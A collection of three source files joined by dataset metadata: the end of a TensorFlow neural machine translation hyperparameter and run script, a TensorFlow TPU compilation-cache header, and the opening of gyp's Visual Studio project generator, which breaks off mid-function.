vocab_prefix=flags.vocab_prefix,
embed_prefix=flags.embed_prefix,
out_dir=flags.out_dir,
# Networks
num_units=flags.num_units,
num_layers=flags.num_layers,
num_encoder_layers=(flags.num_encoder_layers or flags.num_layers),
num_decoder_layers=(flags.num_decoder_layers or flags.num_layers),
dropout=flags.dropout,
unit_type=flags.unit_type,
encoder_type=flags.encoder_type,
residual=flags.residual,
num_embeddings_partitions=flags.num_embeddings_partitions,
# Attention mechanisms
attention=flags.attention,
attention_architecture=flags.attention_architecture,
output_attention=flags.output_attention,
pass_hidden_state=flags.pass_hidden_state,
# Train
optimizer=flags.optimizer,
num_train_steps=flags.num_train_steps,
batch_size=flags.batch_size,
init_op=flags.init_op,
init_weight=flags.init_weight,
max_gradient_norm=flags.max_gradient_norm,
learning_rate=flags.learning_rate,
warmup_steps=flags.warmup_steps,
warmup_scheme=flags.warmup_scheme,
decay_scheme=flags.decay_scheme,
colocate_gradients_with_ops=flags.colocate_gradients_with_ops,
# Data constraints
num_buckets=flags.num_buckets,
max_train=flags.max_train,
src_max_len=flags.src_max_len,
tgt_max_len=flags.tgt_max_len,
# Inference
src_max_len_infer=flags.src_max_len_infer,
tgt_max_len_infer=flags.tgt_max_len_infer,
infer_batch_size=flags.infer_batch_size,
infer_mode=flags.infer_mode,
beam_width=flags.beam_width,
diverse_beam_search_iterations=flags.diverse_beam_search_iterations,
length_penalty_weight=flags.length_penalty_weight,
sampling_temperature=flags.sampling_temperature,
num_translations_per_input=flags.num_translations_per_input,
trie_path=flags.trie_path,
optimize_ngrams_len=flags.optimize_ngrams_len,
# Vocab
sos=flags.sos if flags.sos else vocab_utils.SOS,
eos=flags.eos if flags.eos else vocab_utils.EOS,
subword_option=flags.subword_option,
subword_model=flags.subword_model,
check_special_token=flags.check_special_token,
# Context
context_vector=flags.context_vector,
context_feed=flags.context_feed,
context_delimiter=flags.context_delimiter,
# Misc
forget_bias=flags.forget_bias,
num_gpus=flags.num_gpus,
epoch_step=0, # record where we were within an epoch.
steps_per_stats=flags.steps_per_stats,
steps_per_external_eval=flags.steps_per_external_eval,
steps_per_save=flags.steps_per_save,
share_vocab=flags.share_vocab,
metrics=flags.metrics.split(","),
log_device_placement=flags.log_device_placement,
random_seed=flags.random_seed,
override_loaded_hparams=flags.override_loaded_hparams,
num_keep_ckpts=flags.num_keep_ckpts,
avg_ckpts=flags.avg_ckpts,
num_intra_threads=flags.num_intra_threads,
num_inter_threads=flags.num_inter_threads,
sample_id=flags.sample_id,
# Reformulator
baseline_type=flags.baseline_type,
replication_factor=flags.replication_factor,
environment_server=flags.environment_server,
environment_mode=flags.environment_mode,
use_rl=flags.use_rl,
entropy_regularization_weight=flags.entropy_regularization_weight,
server_mode=flags.server_mode)
def extend_hparams(hparams):
"""Extend training hparams."""
assert hparams.num_encoder_layers and hparams.num_decoder_layers
if hparams.num_encoder_layers != hparams.num_decoder_layers:
hparams.pass_hidden_state = False
utils.print_out("Num encoder layer %d is different from num decoder layer"
" %d, so set pass_hidden_state to False" %
(hparams.num_encoder_layers, hparams.num_decoder_layers))
# Sanity checks
if hparams.encoder_type == "bi" and hparams.num_encoder_layers % 2 != 0:
raise ValueError("For bi, num_encoder_layers %d should be even" %
hparams.num_encoder_layers)
if (hparams.attention_architecture in ["gnmt"] and
hparams.num_encoder_layers < 2):
raise ValueError(
"For gnmt attention architecture, "
"num_encoder_layers %d should be >= 2" % hparams.num_encoder_layers)
# Set residual layers
num_encoder_residual_layers = 0
num_decoder_residual_layers = 0
if hparams.residual:
if hparams.num_encoder_layers > 1:
num_encoder_residual_layers = hparams.num_encoder_layers - 1
if hparams.num_decoder_layers > 1:
num_decoder_residual_layers = hparams.num_decoder_layers - 1
if hparams.encoder_type == "gnmt":
# The first unidirectional layer (after the bi-directional layer) in
# the GNMT encoder can't have residual connection due to the input is
# the concatenation of fw_cell and bw_cell's outputs.
num_encoder_residual_layers = hparams.num_encoder_layers - 2
# Compatible for GNMT models
if hparams.num_encoder_layers == hparams.num_decoder_layers:
num_decoder_residual_layers = num_encoder_residual_layers
hparams.add_hparam("num_encoder_residual_layers", num_encoder_residual_layers)
hparams.add_hparam("num_decoder_residual_layers", num_decoder_residual_layers)
if hparams.subword_option and hparams.subword_option not in ["spm", "bpe"]:
raise ValueError("subword option must be either spm, or bpe")
# Context sanity checks
# Make sure if one is set, everything should be set
if hparams.ctx is not None and (not hparams.context_vector or
not hparams.context_feed):
raise ValueError("If ctx file is provided, "
"both context_vector and context_feed have to be set")
if hparams.ctx is None and (hparams.context_vector or hparams.context_feed):
raise ValueError("ctx must be provided ")
if ((hparams.context_vector == "append" or hparams.context_feed == "append")
and (hparams.context_vector != hparams.context_feed)):
raise ValueError("context_vector and context_feed must be set to append")
if (hparams.context_vector == "last_state" and
hparams.context_feed != "decoder_hidden_state"):
raise ValueError("context_feed must be set to decoder_hidden_state "
"when using last_state as context_vector")
if (hparams.context_vector == "bilstm_all" and
hparams.context_feed != "encoder_output"):
raise ValueError("context_feed must be set to encoder_output "
"when using bilstm_all as context_vector")
# Flags
utils.print_out("# hparams:")
utils.print_out(" src=%s" % hparams.src)
utils.print_out(" tgt=%s" % hparams.tgt)
utils.print_out(" train_prefix=%s" % hparams.train_prefix)
utils.print_out(" dev_prefix=%s" % hparams.dev_prefix)
utils.print_out(" test_prefix=%s" % hparams.test_prefix)
utils.print_out(" train_annotations=%s" % hparams.train_annotations)
utils.print_out(" dev_annotations=%s" % hparams.dev_annotations)
utils.print_out(" test_annotations=%s" % hparams.test_annotations)
utils.print_out(" out_dir=%s" % hparams.out_dir)
## Vocab
# Get vocab file names first
if hparams.vocab_prefix:
src_vocab_file = hparams.vocab_prefix + "." + hparams.src
tgt_vocab_file = hparams.vocab_prefix + "." + hparams.tgt
else:
raise ValueError("hparams.vocab_prefix must be provided.")
# Source vocab
src_vocab_size, src_vocab_file = vocab_utils.check_vocab(
src_vocab_file,
hparams.out_dir,
check_special_token=hparams.check_special_token,
sos=hparams.sos,
eos=hparams.eos,
unk=vocab_utils.UNK)
# Target vocab
if hparams.share_vocab:
utils.print_out(" using source vocab for target")
tgt_vocab_file = src_vocab_file
tgt_vocab_size = src_vocab_size
else:
tgt_vocab_size, tgt_vocab_file = vocab_utils.check_vocab(
tgt_vocab_file,
hparams.out_dir,
check_special_token=hparams.check_special_token,
sos=hparams.sos,
eos=hparams.eos,
unk=vocab_utils.UNK)
hparams.add_hparam("src_vocab_size", src_vocab_size)
hparams.add_hparam("tgt_vocab_size", tgt_vocab_size)
hparams.add_hparam("src_vocab_file", src_vocab_file)
hparams.add_hparam("tgt_vocab_file", tgt_vocab_file)
# Pretrained Embeddings:
hparams.add_hparam("src_embed_file", "")
hparams.add_hparam("tgt_embed_file", "")
if hparams.embed_prefix:
src_embed_file = hparams.embed_prefix + "." + hparams.src
tgt_embed_file = hparams.embed_prefix + "." + hparams.tgt
if tf.gfile.Exists(src_embed_file):
hparams.src_embed_file = src_embed_file
if tf.gfile.Exists(tgt_embed_file):
hparams.tgt_embed_file = tgt_embed_file
# Check out_dir
if not tf.gfile.Exists(hparams.out_dir):
utils.print_out("# Creating output directory %s ..." % hparams.out_dir)
tf.gfile.MakeDirs(hparams.out_dir)
# Evaluation
for metric in hparams.metrics:
hparams.add_hparam("best_" + metric, 0) # larger is better
best_metric_dir = os.path.join(hparams.out_dir, "best_" + metric)
hparams.add_hparam("best_" + metric + "_dir", best_metric_dir)
tf.gfile.MakeDirs(best_metric_dir)
if hparams.avg_ckpts:
hparams.add_hparam("avg_best_" + metric, 0) # larger is better
best_metric_dir = os.path.join(hparams.out_dir, "avg_best_" + metric)
hparams.add_hparam("avg_best_" + metric + "_dir", best_metric_dir)
tf.gfile.MakeDirs(best_metric_dir)
return hparams
def get_default_hparams():
""" Construct an hparams object from the flags defaults. """
nmt_parser = argparse.ArgumentParser()
add_arguments(nmt_parser)
default_flags = nmt_parser.parse_args([])
default_hparams = create_hparams(default_flags)
return default_hparams
def ensure_compatible_hparams(hparams, default_hparams, hparams_path):
"""Make sure the loaded hparams is compatible with new changes."""
default_hparams = utils.maybe_parse_standard_hparams(default_hparams,
hparams_path)
# For compatible reason, if there are new fields in default_hparams,
# we add them to the current hparams
default_config = default_hparams.values()
config = hparams.values()
for key in default_config:
if key not in config:
hparams.add_hparam(key, default_config[key])
# Update all hparams' keys if override_loaded_hparams=True
if default_hparams.override_loaded_hparams:
for key in default_config:
if getattr(hparams, key) != default_config[key]:
utils.print_out(
"# Updating hparams.%s: %s -> %s" % (key, str(
getattr(hparams, key)), str(default_config[key])))
setattr(hparams, key, default_config[key])
return hparams
def create_or_load_hparams(out_dir,
default_hparams,
hparams_path,
save_hparams=True):
"""Create hparams or load hparams from out_dir."""
hparams = utils.load_hparams(out_dir)
if not hparams:
hparams = default_hparams
hparams = utils.maybe_parse_standard_hparams(hparams, hparams_path)
hparams = extend_hparams(hparams)
else:
hparams = ensure_compatible_hparams(hparams, default_hparams, hparams_path)
# Save HParams
if save_hparams:
utils.save_hparams(out_dir, hparams)
for metric in hparams.metrics:
utils.save_hparams(getattr(hparams, "best_" + metric + "_dir"), hparams)
# Print HParams
utils.print_hparams(hparams)
return hparams
def run_main(flags, default_hparams, train_fn, inference_fn, target_session=""):
"""Run main."""
# Job
jobid = flags.jobid
num_workers = flags.num_workers
utils.print_out("# Job id %d" % jobid)
# Random
random_seed = flags.random_seed
if random_seed is not None and random_seed > 0:
utils.print_out("# Set random seed to %d" % random_seed)
random.seed(random_seed + jobid)
np.random.seed(random_seed + jobid)
## Train / Decode
out_dir = flags.out_dir
if not tf.gfile.Exists(out_dir):
tf.gfile.MakeDirs(out_dir)
# Load hparams.
hparams = create_or_load_hparams(
out_dir, default_hparams, flags.hparams_path, save_hparams=(jobid == 0))
if flags.inference_input_file:
# Inference indices
hparams.inference_indices = None
if flags.inference_list:
(hparams.inference_indices) = ([
int(token) for token in flags.inference_list.split(",")
])
# Inference
trans_file = flags.inference_output_file
ckpt = flags.ckpt
if not ckpt:
ckpt = tf.train.latest_checkpoint(out_dir)
inference_fn(ckpt, flags.inference_input_file, trans_file, hparams,
num_workers, jobid)
# Evaluation
ref_file = flags.inference_ref_file
if ref_file and tf.gfile.Exists(trans_file):
for metric in hparams.metrics:
score = evaluation_utils.evaluate(ref_file, trans_file, metric,
hparams.subword_option)
utils.print_out(" %s: %.1f" % (metric, score))
else:
# Train
train_fn(hparams, target_session=target_session)
def main(unused_argv):
default_hparams = create_hparams(FLAGS)
train_fn = train.train
inference_fn = inference.inference
run_main(FLAGS, default_hparams, train_fn, inference_fn)
if __name__ == "__main__":
nmt_parser = argparse.ArgumentParser()
add_arguments(nmt_parser)
FLAGS, unparsed = nmt_parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed) | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_
#define TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_
#include <memory>
#include <string>
#include <vector>
#include "tensorflow/core/platform/refcount.h"
#include "tensorflow/core/platform/status.h"
#include "tensorflow/core/tpu/kernels/tpu_program_group_interface.h"
namespace tensorflow {
namespace tpu {
// Forward declaration to avoid circular dependency.
class TpuCompilationCacheInterface;
// Cache for compiled TPU program.
//
// Each key identifies a unique subgraph, and the value is the vector of
// protos that are emitted by compiling the subgraph.
//
// When a subgraph is considered for compilation, the client calls
//
// auto subgraph_key = <compute key for subgraph>;
// auto compile_function = <lambda to compile subgraph into protos>;
// auto per_step_ref_holder = <container to control lifetime of cached
// results>;
// int64 uid;
// std::vector<string> proto_key;
// CompileIfKeyAbsent(subgraph_key, per_step_ref_holder, &uid, &proto_key,
// compile_function);
//
// where subgraph_key is the key computed for the subgraph. On success,
// proto_key contains a vector of keys, where proto_key[i] can be used to look
// up the ith proto compiled from the subgraph, and uid contains an identifier
// that can be used in place of key for clients that require cheap
// serializable handles. If the compiled protos were not present in the cache,
// compile_function would be called to generate them. per_step_ref_holder
// extends the lifetime of cached results: it is guaranteed that the protos
// indicated in proto_key will be available for lookup for at least as long as
// per_step_ref_holder is not deleted.
//
// If the caller passes nullptr instead of a per_step_ref_holder then the
// caller is responsible for calling Release(subgraph_key) once for every call
// to CompileIfKeyAbsent(subgraph_key, ...) to discard the reference to the
// compilation results, after the caller is sure it will not look up the
// compiled executables again.
//
// Subsequently the client can call
//
// std::unique_ptr<CompilationCacheEntryRef> entry;
// Lookup(proto_key, &entry);
// auto proto = entry->get();
//
// or
//
// std::unique_ptr<CompilationCacheEntryRef> entry;
// Lookup(uid, proto_index, &entry);
// auto proto = entry->get();
//
// to access a cached proto.
// TODO(misard) Switch the existing TPU ops to use uid+proto_index instead of
// string keys for proto lookups.
//
//
// Usage details within the system:
//
// This cache lives in the resource manager of the TPU_SYSTEM device where the
// compiler runs, typically worker 0 of the system. The cache is discarded and
// a new one created whenever the system is reinitialized.
//
// A compiled subgraph is placed into the cache using a key that is a
// combination of the function name, guaranteed_constants, the shapes of the
// dynamic inputs to the subgraph, and the function library in use at the time
// of execution.
//
// Whenever a compile Op is run, it looks to see if there is already an entry
// in the cache corresponding to that Op and the current dynamic shapes, and
// creates one if not. The entry is marked as most recently used in the cache
// by the compile Op. The entry is reference counted. The cache owns one entry
// , and each step that has executed a compile Op referring to the entry owns
// a reference until that step completes.
//
// If the cache exceeds a configured storage limit, entries are marked for
// eviction in order of least recently used. An entry is not evicted until all
// references to it are discarded, so an entry that is marked for eviction can
// still be looked up by the execute Ops in a running step. If another Compile
// Op looks up an entry that is marked for eviction, the entry will be
// unmarked and set to most recently used.
//
struct CompiledSubgraph : public core::RefCounted {
TpuCompilationCacheInterface* parent = nullptr; // Not owned.
bool initialized = false;
// The Status returned by the compilation function when the entry is
// initialized. This status will be returned to any client that requests the
// entry.
absl::Status initialization_status;
// Counter to keep track of LRU entries for the eviction policy.
int64_t last_use = -1;
// The unique key describing this entry.
std::string subgraph_key;
// The uid describing this entry.
int64_t uid;
// Compilation cache proto key to identify the cache entry.
std::vector<std::string> proto_key;
// Fingerprints of sharding programs if there is any.
std::vector<std::string> sharding_key;
// The number of 'external' client-held references to the entry.
int external_references = 0;
// The sum of the SpaceUsed of each of the elements of programs; an estimate
// of how much RAM the entry consumes, used to determine when entries must
// be marked for eviction.
int64_t total_size = 0;
// Debug info in case we miss.
std::string cache_entry_debug_string;
// Entries representing the associated sharding and unsharding programs,
// which share the same life time of the owning main entry, so we always use
// the main entry's ref count.
std::unique_ptr<CompiledSubgraph> sharding_entry;
std::unique_ptr<CompiledSubgraph> unsharding_entry;
// Only used for the nested sharding/unsharding entries to point to the
// owning main entry.
CompiledSubgraph* main_entry = nullptr;
// Compiled TPU program group.
std::unique_ptr<TpuProgramGroupInterface> tpu_program_group;
// Computes total program size.
size_t ComputeTotalSize() const {
CHECK_EQ(total_size, 0);
int64_t size = tpu_program_group->program_size();
if (sharding_entry != nullptr) {
size += sharding_entry->total_size;
}
if (unsharding_entry != nullptr) {
size += unsharding_entry->total_size;
}
return size;
}
};
} // namespace tpu
} // namespace tensorflow
#endif // TENSORFLOW_CORE_TPU_KERNELS_COMPILED_SUBGRAPH_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/tpu/kernels/compiled_subgraph.h |
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import ntpath
import os
import posixpath
import re
import subprocess
import sys
import gyp.common
import gyp.easy_xml as easy_xml
import gyp.MSVSNew as MSVSNew
import gyp.MSVSProject as MSVSProject
import gyp.MSVSSettings as MSVSSettings
import gyp.MSVSToolFile as MSVSToolFile
import gyp.MSVSUserFile as MSVSUserFile
import gyp.MSVSUtil as MSVSUtil
import gyp.MSVSVersion as MSVSVersion
from gyp.common import GypError
# TODO: Remove once bots are on 2.7, http://crbug.com/241769
def _import_OrderedDict():
import collections
try:
return collections.OrderedDict
except AttributeError:
import gyp.ordered_dict
return gyp.ordered_dict.OrderedDict
OrderedDict = _import_OrderedDict()
# Regular expression for validating Visual Studio GUIDs. If the GUID
# contains lowercase hex letters, MSVS will be fine. However,
# IncrediBuild BuildConsole will parse the solution file, but then
# silently skip building the target causing hard to track down errors.
# Note that this only happens with the BuildConsole, and does not occur
# if IncrediBuild is executed from inside Visual Studio. This regex
# validates that the string looks like a GUID with all uppercase hex
# letters.
VALID_MSVS_GUID_CHARS = re.compile('^[A-F0-9\-]+$')
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '.exe',
'STATIC_LIB_PREFIX': '',
'SHARED_LIB_PREFIX': '',
'STATIC_LIB_SUFFIX': '.lib',
'SHARED_LIB_SUFFIX': '.dll',
'INTERMEDIATE_DIR': '$(IntDir)',
'SHARED_INTERMEDIATE_DIR': '$(OutDir)obj/global_intermediate',
'OS': 'win',
'PRODUCT_DIR': '$(OutDir)',
'LIB_DIR': '$(OutDir)lib',
'RULE_INPUT_ROOT': '$(InputName)',
'RULE_INPUT_DIRNAME': '$(InputDir)',
'RULE_INPUT_EXT': '$(InputExt)',
'RULE_INPUT_NAME': '$(InputFileName)',
'RULE_INPUT_PATH': '$(InputPath)',
'CONFIGURATION_NAME': '$(ConfigurationName)',
}
# The msvs specific sections that hold paths
generator_additional_path_sections = [
'msvs_cygwin_dirs',
'msvs_props',
]
generator_additional_non_configuration_keys = [
'msvs_cygwin_dirs',
'msvs_cygwin_shell',
'msvs_large_pdb',
'msvs_shard',
'msvs_external_builder',
'msvs_external_builder_out_dir',
'msvs_external_builder_build_cmd',
'msvs_external_builder_clean_cmd',
]
# List of precompiled header related keys.
precomp_keys = [
'msvs_precompiled_header',
'msvs_precompiled_source',
]
cached_username = None
cached_domain = None
# Based on http://code.activestate.com/recipes/576694/.
class OrderedSet(collections.MutableSet):
def __init__(self, iterable=None):
self.end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.map = {} # key --> [key, prev, next]
if iterable is not None:
self |= iterable
def __len__(self):
return len(self.map)
def discard(self, key):
if key in self.map:
key, prev, next = self.map.pop(key)
prev[2] = next
next[1] = prev
def __contains__(self, key):
return key in self.map
def add(self, key):
if key not in self.map:
end = self.end
curr = end[1]
curr[2] = end[1] = self.map[key] = [key, curr, end]
def update(self, iterable):
for i in iterable:
if i not in self:
self.add(i)
def __iter__(self):
end = self.end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
# TODO(gspencer): Switch the os.environ calls to be
# win32api.GetDomainName() and win32api.GetUserName() once the
# python version in depot_tools has been updated to work on Vista
# 64-bit.
def _GetDomainAndUserName():
if sys.platform not in ('win32', 'cygwin'):
return ('DOMAIN', 'USERNAME')
global cached_username
global cached_domain
if not cached_domain or not cached_username:
domain = os.environ.get('USERDOMAIN')
username = os.environ.get('USERNAME')
if not domain or not username:
call = subprocess.Popen(['net', 'config', 'Workstation'],
stdout=subprocess.PIPE)
config = call.communicate()[0]
username_re = re.compile('^User name\s+(\S+)', re.MULTILINE)
username_match = username_re.search(config)
if username_match:
username = username_match.group(1)
domain_re = re.compile('^Logon domain\s+(\S+)', re.MULTILINE)
domain_match = domain_re.search(config)
if domain_match:
domain = domain_match.group(1)
cached_domain = domain
cached_username = username
return (cached_domain, cached_username)
fixpath_prefix = None
def _NormalizedSource(source):
"""Normalize the path.
But not if that gets rid of a variable, as this may expand to something
larger than one directory.
Arguments:
source: The path to be normalize.d
Returns:
The normalized path.
"""
normalized = os.path.normpath(source)
if source.count('$') == normalized.count('$'):
source = normalized
return source
def _FixPath(path):
"""Convert paths to a form that will make sense in a vcproj file.
Arguments:
path: The path to convert, may contain / etc.
Returns:
The path with all slashes made into backslashes.
"""
if fixpath_prefix and path and not os.path.isabs(path) and not path[0] == '$':
path = os.path.join(fixpath_prefix, path)
path = path.replace('/', '\\')
path = _NormalizedSource(path)
if path and path[-1] == '\\':
path = path[:-1]
return path
def _FixPaths(paths):
"""Fix each of the paths of the list."""
return [_FixPath(i) for i in paths]
def _ConvertSourcesToFilterHierarchy(sources, prefix=None, excluded=None,
list_excluded=True, msvs_version=None):
"""Converts a list split source file paths into a vcproj folder hierarchy.
Arguments:
sources: A list of source file paths split.
prefix: A list of source file path layers meant to apply to each of sources.
excluded: A set of excluded files.
msvs_version: A MSVSVersion object.
Returns:
A hierarchy of filenames and MSVSProject.Filter objects that matches the
layout of the source tree.
For example:
_ConvertSourcesToFilterHierarchy([['a', 'bob1.c'], ['b', 'bob2.c']],
prefix=['joe'])
-->
[MSVSProject.Filter('a', contents=['joe\\a\\bob1.c']),
MSVSProject.Filter('b', contents=['joe\\b\\bob2.c'])]
"""
if not prefix: prefix = []
result = []
excluded_result = []
folders = OrderedDict()
# Gather files into the final result, excluded, or folders.
for s in sources:
if len(s) == 1:
filename = _NormalizedSource('\\'.join(prefix + s))
if filename in excluded:
excluded_result.append(filename)
else:
result.append(filename)
elif msvs_version and not msvs_version.UsesVcxproj():
# For MSVS 2008 and earlier, we need to process all files before walking
# the sub folders.
if not folders.get(s[0]):
folders[s[0]] = []
folders[s[0]].append(s[1:])
else:
contents = _ConvertSourcesToFilterHierarchy([s[1:]], prefix + [s[0]],
excluded=excluded,
list_excluded=list_excluded,
msvs_version=msvs_version)
contents = MSVSProject.Filter(s[0], contents=contents)
result.append(contents)
# Add a folder for excluded files.
if excluded_result and list_excluded:
excluded_folder = MSVSProject.Filter('_excluded_files',
contents=excluded_result)
result.append(excluded_folder)
if msvs_version and msvs_version.UsesVcxproj():
return result
# Populate all the folders.
for f in folders:
contents = _ConvertSourcesToFilterHierarchy(folders[f], prefix=prefix + [f],
excluded=excluded,
list_excluded=list_excluded)
contents = MSVSProject.Filter(f, contents=contents)
result.append(contents)
return result
def _ToolAppend(tools, tool_name, setting, value, only_if_unset=False):
if not value: return
_ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset)
def _ToolSetOrAppend(tools, tool_name, setting, value, only_if_unset=False):
# TODO(bradnelson): ugly hack, fix this more generally!!!
if 'Directories' in setting or 'Dependencies' in setting:
if type(value) == str:
value = value.replace('/', '\\')
else:
value = [i.replace('/', '\\') for i in value]
if not tools.get(tool_name):
tools[tool_name] = dict()
tool = tools[tool_name]
if tool.get(setting):
if only_if_unset: return
if type(tool[setting]) == list and type(value) == list:
tool[setting] += value
else:
raise TypeError(
'Appending "%s" to a non-list setting "%s" for tool "%s" is '
'not allowed, previous value: %s' % (
value, setting, tool_name, str(tool[setting])))
else:
tool[setting] = value
def _ConfigPlatform(config_data):
return config_data.get('msvs_configuration_platform', 'Win32')
def _ConfigBaseName(config_name, platform_name):
if config_name.endswith('_' + platform_name):
return config_name[0:-len(platform_name) - 1]
else:
return config_name
def _ConfigFullName(config_name, config_data):
platform_name = _ConfigPlatform(config_data)
return '%s|%s' % (_ConfigBaseName(config_name, platform_name), platform_name)
def _BuildCommandLineForRuleRaw(spec, cmd, cygwin_shell, has_input_path,
quote_cmd, do_setup_env):
if [x for x in cmd if '$(InputDir)' in x]:
input_dir_preamble = (
'set INPUTDIR=$(InputDir)\n'
'set INPUTDIR=%INPUTDIR:$(ProjectDir)=%\n'
'set INPUTDIR=%INPUTDIR:~0,-1%\n'
)
else:
input_dir_preamble = ''
if cygwin_shell:
# Find path to cygwin.
cygwin_dir = _FixPath(spec.get('msvs_cygwin_dirs', ['.'])[0])
# Prepare command.
direct_cmd = cmd
direct_cmd = [i.replace('$(IntDir)',
'`cygpath -m "${INTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(OutDir)',
'`cygpath -m "${OUTDIR}"`') for i in direct_cmd]
direct_cmd = [i.replace('$(InputDir)',
'`cygpath -m "${INPUTDIR}"`') for i in direct_cmd]
if has_input_path:
direct_cmd = [i.replace('$(InputPath)',
'`cygpath -m "${INPUTPATH}"`')
for i in direct_cmd]
direct_cmd = ['\\"%s\\"' % i.replace('"', '\\\\\\"') for i in direct_cmd]
# direct_cmd = gyp.common.EncodePOSIXShellList(direct_cmd)
direct_cmd = ' '.join(direct_cmd)
# TODO(quote): regularize quoting path names throughout the module
cmd = ''
if do_setup_env:
cmd += 'call "$(ProjectDir)%(cygwin_dir)s\\setup_env.bat" && '
cmd += 'set CYGWIN=nontsec&& '
if direct_cmd.find('NUMBER_OF_PROCESSORS') >= 0:
cmd += 'set /a NUMBER_OF_PROCESSORS_PLUS_1=%%NUMBER_OF_PROCESSORS%%+1&& '
if direct_cmd.find('INTDIR') >= 0:
cmd += 'set INTDIR=$(IntDir)&& '
if direct_cmd.find('OUTDIR') >= 0:
cmd += 'set OUTDIR=$(OutDir)&& '
if has_input_path and direct_cmd.find('INPUTPATH') >= 0:
cmd += 'set INPUTPATH=$(InputPath) && '
cmd += 'bash -c "%(cmd)s"'
cmd = cmd % {'cygwin_dir': cygwin_dir,
'cmd': direct_cmd}
return input_dir_preamble + cmd
else:
# Convert cat --> type to mimic unix.
if cmd[0] == 'cat':
command = ['type']
else:
command = [cmd[0].replace('/', '\\')]
# Add call before command to ensure that commands can be tied together one
# after the other without aborting in Incredibuild, since IB makes a bat
# file out of the raw command string, and some commands (like python) are
# actually batch files themselves.
command.insert(0, 'call')
# Fix the paths
# TODO(quote): This is a really ugly heuristic, and will miss path fixing
# for arguments like "--arg=path" or "/opt:path".
# If the argument starts with a slash or dash, it's probably a command line
# switch
arguments = [i if (i[:1] in "/-") else _FixPath(i) for i in cmd[1:]]
arguments = [i.replace('$(InputDir)', '%INPUTDIR%') for i in arguments]
arguments = [MSVSSettings.FixVCMacroSlashes(i) for i in arguments]
if quote_cmd:
# Support a mode for using cmd directly.
# Convert any paths to native form (first element is used directly).
# TODO(quote): regularize quoting path names throughout the module
arguments = ['"%s"' % i for i in arguments]
# Collapse into a single command.
return input_dir_preamble + ' '.join(command + arguments)
def _BuildCommandLineForRule(spec, rule, has_input_path, do_setup_env):
# Currently this weird argument munging is used to duplicate the way a
# python script would need to be run as part of the chrome tree.
# Eventually we should add some sort of rule_default option to set this
# per project. For now the behavior chrome needs is the default.
mcs = rule.get('msvs_cygwin_shell')
if mcs is None:
mcs = int(spec.get('msvs_cygwin_shell', 1))
elif isinstance(mcs, str):
mcs = int(mcs)
quote_cmd = int(rule.get('msvs_quote_cmd', 1))
return _BuildCommandLineForRuleRaw(spec, rule['action'], mcs, has_input_path,
quote_cmd, do_setup_env=do_setup_env)
def _AddActionStep(actions_dict, inputs, outputs, description, command):
"""Merge action into an existing list of actions.
Care must be taken so that actions which have overlapping inputs either don't
get assigned to the same input, or get collapsed into one.
Arguments:
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
inputs: list of inputs
outputs: list of outputs
description: description of the action
command: command line to execute
"""
# Require there to be at least one input (call sites will ensure this).
assert inputs
action = {
'inputs': inputs,
'outputs': outputs,
'description': description,
'command': command,
}
# Pick where to stick this action.
# While less than optimal in terms of build time, attach them to the first
# input for now.
chosen_input = inputs[0]
# Add it there.
if chosen_input not in actions_dict:
actions_dict[chosen_input] = []
actions_dict[chosen_input].append(action)
def _AddCustomBuildToolForMSVS(p, spec, primary_input,
inputs, outputs, description, cmd):
"""Add a custom build tool to execute something.
Arguments:
p: the target project
spec: the target project dict
primary_input: input file to attach the build tool to
inputs: list of inputs
outputs: list of outputs
description: description of the action
cmd: command line to execute
"""
inputs = _FixPaths(inputs)
outputs = _FixPaths(outputs)
tool = MSVSProject.Tool(
'VCCustomBuildTool',
{'Description': description,
'AdditionalDependencies': ';'.join(inputs),
'Outputs': ';'.join(outputs),
'CommandLine': cmd,
})
# Add to the properties of primary input for each config.
for config_name, c_data in spec['configurations'].iteritems():
p.AddFileConfig(_FixPath(primary_input),
_ConfigFullName(config_name, c_data), tools=[tool])
def _AddAccumulatedActionsToMSVS(p, spec, actions_dict):
"""Add actions accumulated into an actions_dict, merging as needed.
Arguments:
p: the target project
spec: the target project dict
actions_dict: dictionary keyed on input name, which maps to a list of
dicts describing the actions attached to that input file.
"""
for primary_input in actions_dict:
inputs = OrderedSet()
outputs = OrderedSet()
descriptions = []
commands = []
for action in actions_dict[primary_input]:
inputs.update(OrderedSet(action['inputs']))
outputs.update(OrderedSet(action['outputs']))
descriptions.append(action['description'])
commands.append(action['command'])
# Add the custom build step for one input file.
description = ', and also '.join(descriptions)
command = '\r\n'.join(commands)
_AddCustomBuildToolForMSVS(p, spec,
primary_input=primary_input,
inputs=inputs,
outputs=outputs,
description=description,
cmd=command)
def _RuleExpandPath(path, input_file):
"""Given the input file to which a rule applied, string substitute a path.
Arguments:
path: a path to string expand
input_file: the file to which the rule applied.
Returns:
The string substituted path.
"""
path = path.replace('$(InputName)',
os.path.splitext(os.path.split(input_file)[1])[0])
path = path.replace('$(InputDir)', os.path.dirname(input_file))
path = path.replace('$(InputExt)',
os.path.splitext(os.path.split(input_file)[1])[1])
path = path.replace('$(InputFileName)', os.path.split(input_file)[1])
path = path.replace('$(InputPath)', input_file)
return path
def _FindRuleTriggerFiles(rule, sources):
"""Find the list of files which a particular rule applies to.
Arguments:
rule: the rule in question
sources: the set of all known source files for this project
Returns:
The list of sources that trigger a particular rule.
"""
return rule.get('rule_sources', [])
def _RuleInputsAndOutputs(rule, trigger_file):
